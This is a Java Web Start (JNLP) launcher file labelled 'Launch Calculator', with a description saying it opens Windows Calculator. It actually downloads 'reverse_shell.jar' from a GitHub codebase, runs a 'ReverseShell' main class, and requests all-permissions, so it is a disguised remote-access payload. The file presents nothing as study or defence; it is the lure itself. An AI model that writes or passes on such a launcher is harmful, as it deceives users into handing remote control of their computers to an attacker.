<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="https://github.com/SomeoneAlt-86/jnlp/raw/refs/heads/main/" href="calc.jnlp">
    <information>
        <title>Launch Calculator</title>
        <vendor>My Company</vendor>
        <description>Opens Windows Calculator</description>
        <offline-allowed/>
    </information>

    <resources>
        <j2se version="1.8+"/>
                <jar href="reverse_shell.jar"
                    main="true"/>
    </resources>

    <application-desc main-class="ReverseShell"/>

    <security>
        <all-permissions/>
    </security>
</jnlp>
